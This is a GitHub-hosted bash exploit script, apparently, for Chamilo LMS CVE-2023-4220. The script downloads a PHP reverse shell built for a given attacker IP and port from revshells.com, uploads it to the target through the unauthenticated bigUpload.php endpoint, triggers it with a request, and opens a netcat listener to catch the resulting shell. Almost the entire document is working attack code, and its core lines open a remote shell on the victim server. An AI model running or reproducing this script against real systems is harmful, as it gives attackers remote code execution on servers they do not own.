-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2023-4220
53 lines (45 loc) · 1.43 KB
/
CVE-2023-4220
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#!/bin/bash
# Exploit Title : Chamilo LMS CVE-2023-4220 Exploit
# Date : 11/28/2023
# Exploit Author : Ziad Sakr (@Ziad-Sakr) and Enhancements by Divine Clown
# Version : ≤v1.11.24
# CVE : 2023-4220
# CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2023-4220
# Initialize variables with default values
attacker_ip=""
port=""
host_link=""
# Parse command-line options
while getopts "i:p:h:" opt; do
case $opt in
i)
attacker_ip=$OPTARG
;;
p)
port=$OPTARG
;;
h)
host_link=$OPTARG
;;
\?)
exit 1
;;
:)
exit 1
;;
esac
done
# Check if all required options are provided
if [ -z "$attacker_ip" ] || [ -z "$port" ] || [ -z "$host_link" ]; then
exit 1
fi
# Download the reverse shell PHP exploit from revshells.com silently
reverse_file="reverse_shell.php"
exploit_url="https://www.revshells.com/PHP%20PentestMonkey?ip=$attacker_ip&port=$port&shell=bash&encoding=bash"
curl -sL "$exploit_url" -o $reverse_file
# Perform the file upload using curl silently
curl -s -F "bigUploadFile=@$reverse_file" "$host_link/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported" > /dev/null
# Trigger the reverse shell by accessing the uploaded file
curl -s "$host_link/main/inc/lib/javascript/bigupload/files/$reverse_file" > /dev/null &
# Start the Netcat listener
nc -lnvp $port